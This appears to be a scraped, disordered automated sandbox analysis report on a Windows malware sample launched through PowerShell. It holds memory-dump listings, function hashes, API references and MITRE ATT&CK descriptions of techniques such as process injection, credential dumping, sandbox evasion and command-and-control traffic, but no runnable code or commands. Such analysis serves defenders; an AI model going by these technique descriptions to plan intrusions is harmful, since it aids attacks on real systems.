GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5E90
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5EBB
CloseHandle.KERNEL32(?), ref: 00CE5EC8
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5ED7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 01783d67f7fa28af06463abe7223da8e6678718f27b96bbe02edda9d23e5544e
Instruction ID: 85f4700a00a8a94e7d75d0c9b30b74321db23eda9d9887638ca6ba377ac1f5a0
Opcode Fuzzy Hash: 01783d67f7fa28af06463abe7223da8e6678718f27b96bbe02edda9d23e5544e
Instruction Fuzzy Hash: F7F01271600684EFDB11DF92DC89FBD777DEB08B54F300161E915950A2D735AB44DB11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 1004 Parent PID: 3508 powershell.exeCOMMON

Executed Functions

Function 00007FFAEE888169, Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862f906729003d0e0d24cae9d9a5ebcd47a15193e9fbeb9fcd3c3c248dd31123
Instruction ID: deaa1b7f1a360c5b7d8adbfb246186a04c81eb978883a34babf18a5688567ef5
Opcode Fuzzy Hash: 862f906729003d0e0d24cae9d9a5ebcd47a15193e9fbeb9fcd3c3c248dd31123
Instruction Fuzzy Hash: 32D17770918A8E8FEBA8DF28C8457E977D1FB58300F54827ED84DC7695DF74A9408B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE888F19, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa48aafbbc22fae8075f94b05b9229d2dd6219d5f347c8423a3a5dd008a2374c
Instruction ID: c92d21267fcdf8fc05253f2e49f6fba1b8db8ba0ca35c5d34ef246fc14c80e68
Opcode Fuzzy Hash: aa48aafbbc22fae8075f94b05b9229d2dd6219d5f347c8423a3a5dd008a2374c
Instruction Fuzzy Hash: FFD18670618A4D8FEBA8DF28C8557E977D1FB54310F51822ED84DC7295DF78A940CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE883F92, Relevance: 1.7, Strings: 1, Instructions: 454COMMON

Download Yara Rule

Strings

la_H, xrefs: 00007FFAEE884160

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID: la_H
API String ID: 0-1552268937
Opcode ID: 0ece726d2b09a0ca02b10258d5f4730e9de7bf9a3a228f5b23deea2d6771801e
Instruction ID: 886479a619353eafc83ef375ce34cc2689ab4ce1c8aa7b199de4ae2366f6acdf
Opcode Fuzzy Hash: 0ece726d2b09a0ca02b10258d5f4730e9de7bf9a3a228f5b23deea2d6771801e
Instruction Fuzzy Hash: 2DE10531A0CA8D8FDB89DF5CC485AA9BBE1FF69310F1541BAD44DC7256CA64F842C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE882EA2, Relevance: 1.6, Strings: 1, Instructions: 380COMMON

Download Yara Rule

Strings

|a_H, xrefs: 00007FFAEE883164

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID: |a_H
API String ID: 0-211609878
Opcode ID: 7c8440c47e19f414090131c4993559b98d82010d26fdd6d6fff575a1bd33d464
Instruction ID: d8af83ff4c44a8389f9b0592284b5941d35fd22f8c6ea96f8ec788498a2866b2
Opcode Fuzzy Hash: 7c8440c47e19f414090131c4993559b98d82010d26fdd6d6fff575a1bd33d464
Instruction Fuzzy Hash: 33D14E30A08A4D8FDF98EF58C495AA97BE1FF69300F55416AD40DD7296CA74FC81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE88328D, Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ee585acd3db4fb79c73bf72c5231f9885e6247d6bdc9b0521f845f7cfdb4e6
Instruction ID: 1cd967ab4b1a756bdb54b01c58f0cac70d1f91c1f06d7d1345f2c63fdf2cedfa
Opcode Fuzzy Hash: 14ee585acd3db4fb79c73bf72c5231f9885e6247d6bdc9b0521f845f7cfdb4e6
Instruction Fuzzy Hash: 6BE1B430908A8D8FDF85EF5CC495AA97BE1FF69300F1541AAD44DD7296CA64FC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE8824AA, Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b649d46060f9729f750c795191f61f86fe052bcce8abad1665dc78c9d74507a
Instruction ID: 7a07f97fe964829fe249833868b837f283ec1956e9494bf5233a9e2ad73e0d04
Opcode Fuzzy Hash: 9b649d46060f9729f750c795191f61f86fe052bcce8abad1665dc78c9d74507a
Instruction Fuzzy Hash: CAE1E270A08A898FDF89EF6CC491AE97BE1FF69300F55416AD44DD7292DA24FC81C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE884348, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afeafecf1ff14faceb6359325a82a13e2960bc946c8a3fe177ae4edc07f936e
Instruction ID: 0e263de4dcef775ea14eb535c9bad65df19570c4ea1ab816c35a216ad83c0da6
Opcode Fuzzy Hash: 7afeafecf1ff14faceb6359325a82a13e2960bc946c8a3fe177ae4edc07f936e
Instruction Fuzzy Hash: 5C312B31A089598FDF84EF58C481EACB7E1FF69700F554169E40DD3296CA64EC82CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE882A0A, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268fdede0d8b6d87c965bf98dab60a215aa19211eb3b0fb8993498899092e8df
Instruction ID: 9afeb5c753b5fcb7ea0ed5cc816a4e5e94522315290f778908d812c6755d7ef1
Opcode Fuzzy Hash: 268fdede0d8b6d87c965bf98dab60a215aa19211eb3b0fb8993498899092e8df
Instruction Fuzzy Hash: 9F01F57271CB451FEB98DE1CA8815B437D1EB99320F50453DE48AC32AAD926F8428742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE8820B8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81ad0dd0b092f6898b952c88c24e4e90583c5ea291a6404b7ea0e90fada243c
Instruction ID: 1a9fa2c102f13b9b7b0372eb36c8bebaca767cbdaab4b944db7d830902f94d5a
Opcode Fuzzy Hash: a81ad0dd0b092f6898b952c88c24e4e90583c5ea291a6404b7ea0e90fada243c
Instruction Fuzzy Hash: BF01713131CA084FDB8CEA1CD4A2AB573E1EB99320B50406ED48AC7696DA26E842C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE8815A5, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f40beb13d468478817903558103c4ee7c97374e8cdcc1924cde62a341ed9a9
Instruction ID: a12308a1024f713de1c4f619707c435715d51b3ed80c5317fc24d1ce26a59c7a
Opcode Fuzzy Hash: 49f40beb13d468478817903558103c4ee7c97374e8cdcc1924cde62a341ed9a9
Instruction Fuzzy Hash: 5901677121CB0C4FDB44EF0CE451AA6B7E0FB99324F50066EE58AC3691DB36E891CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE883343, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722baf28a621960df8f53a8b7194ca150114b7f82bafb8216b6dee884b5a356f
Instruction ID: f36849175d41a8d11720086815d5ae4be21da7d73dd0246f6cf47bfa34a9ad61
Opcode Fuzzy Hash: 722baf28a621960df8f53a8b7194ca150114b7f82bafb8216b6dee884b5a356f
Instruction Fuzzy Hash: 0EF0307271CA080BAB0CBA6CF8464F977C1DB99361B50417FF44AC6297ED16AC8346C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE882A7F, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d51de20d24974b1299698f662a552c0091ef083fbeef16e2a5dee4246937da
Instruction ID: 665d20539c93a70b5cc7f5bc3a4a6fe1cf390a70d58204f0a7d20daffd84bab3
Opcode Fuzzy Hash: 56d51de20d24974b1299698f662a552c0091ef083fbeef16e2a5dee4246937da
Instruction Fuzzy Hash: 48F0547275CB454FDB9CEA1CE44197973D1EB95330F50052EF08BC2696DA26E8428746

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE8840C9, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31a7305ec11ae77a393d34dd82cb8235a001e3835b93387ab5318613e60c0a3
Instruction ID: 894db5dbf1ab8f0e49e2acaf223f4f0f4be20fba0d58f5a0968c6689ac0112cf
Opcode Fuzzy Hash: e31a7305ec11ae77a393d34dd82cb8235a001e3835b93387ab5318613e60c0a3
Instruction Fuzzy Hash: A9F0373275C7044FDB9CAA1CF8425B573D1E799321B40017EF48BC2596E917E8428686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE883BE4, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.289274942.00007FFAEE880000.00000040.00000001.sdmp, Offset: 00007FFAEE880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e41ca5d169260765372d4a3e73589172e9717c6f44c8584556f102ce9fd617
Instruction ID: 957a094b133a11df995afa5cbfee5b33b735b79d7d6a21487ea789a37789b6ef
Opcode Fuzzy Hash: 26e41ca5d169260765372d4a3e73589172e9717c6f44c8584556f102ce9fd617
Instruction Fuzzy Hash: A0E0863170C90C4FDF48EE2DF4919B5B3D2EB99321B54427BD45BC624ADD16E89287C0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report rUUR0qQI22

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Code Manipulations

Function 00CE67AD, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 235
memoryfileCOMMON

Function 00CE7E5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 217
nativethreadCOMMON

Function 00CE5490, Relevance: 25.6, APIs: 17, Instructions: 124
memoryfileCOMMON

Function 00CE4C7B, Relevance: 19.6, APIs: 13, Instructions: 117
servicememoryCOMMON

Function 00CE301C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147
memoryCOMMON

Function 00CE4DDA, Relevance: 16.6, APIs: 11, Instructions: 94
memorynativeCOMMON

Function 00CE2C69, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Function 00CE5368, Relevance: 12.1, APIs: 8, Instructions: 84
fileCOMMON

Function 00CE525B, Relevance: 12.1, APIs: 8, Instructions: 82
fileCOMMON

Function 00CE4B67, Relevance: 10.6, APIs: 7, Instructions: 74
memoryCOMMON

Function 00CE4E18, Relevance: 10.6, APIs: 7, Instructions: 53
memorynativeCOMMON

Function 00CE4E3A, Relevance: 10.6, APIs: 7, Instructions: 53
memorynativeCOMMON

Function 00CE51E6, Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 00CE4C32, Relevance: 3.0, APIs: 2, Instructions: 28
nativeCOMMON

Function 00CE6245, Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 365
memoryfileCOMMON

Function 00CE31EE, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 236
memorynetworkCOMMON

Function 00CE4037, Relevance: 34.7, APIs: 23, Instructions: 164
memoryregistryCOMMON

Function 00CE289B, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 238
memorystringCOMMON

Function 00CE5E73, Relevance: 27.2, APIs: 18, Instructions: 182
memoryCOMMON

Function 00CE6B07, Relevance: 25.7, APIs: 17, Instructions: 182
threadsleepCOMMON

Function 00CE182A, Relevance: 22.7, APIs: 15, Instructions: 248
libraryCOMMON

Function 00CE3573, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86
memoryCOMMON

Function 00CE4A20, Relevance: 15.1, APIs: 10, Instructions: 103
memoryCOMMON

Function 00CE694A, Relevance: 13.6, APIs: 9, Instructions: 85
memoryfileCOMMON

Function 00CE5125, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
processsynchronizationCOMMON

Function 00CE72C0, Relevance: 10.8, APIs: 7, Instructions: 314
memorythreadCOMMON

Function 00CE2E78, Relevance: 10.6, APIs: 7, Instructions: 81
registrymemoryCOMMON

Function 00CE3F60, Relevance: 10.6, APIs: 7, Instructions: 77
memoryfileCOMMON

Function 00CE3A92, Relevance: 9.1, APIs: 6, Instructions: 90
registrymemoryCOMMON

Function 00CE2DBE, Relevance: 9.1, APIs: 6, Instructions: 63
registrymemoryCOMMON

Function 00CE2F62, Relevance: 9.1, APIs: 6, Instructions: 63
registrymemoryCOMMON

Function 00CE3BD8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
stringCOMMON

Function 00CE611A, Relevance: 7.6, APIs: 5, Instructions: 92
fileCOMMON

Function 00CE1D9E, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Function 00CE6DB9, Relevance: 4.5, APIs: 3, Instructions: 47
COMMON

Function 00CE2D3E, Relevance: 4.5, APIs: 3, Instructions: 36
memoryCOMMON

Function 00CE80A9, Relevance: 4.5, APIs: 3, Instructions: 26
synchronizationCOMMON

Function 00CE1AC3, Relevance: 1.5, APIs: 1, Instructions: 19
libraryloaderCOMMON

Function 00CE81B5, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00CE4255, Relevance: 73.9, APIs: 38, Strings: 4, Instructions: 414
memoryregistryCOMMON

Function 00CE57E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 208
memorynativeCOMMON

Function 00CE380C, Relevance: 15.1, APIs: 10, Instructions: 78
memorylibrarynativeCOMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Packet capture, Packet capture, Web application firewall logs, Web logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre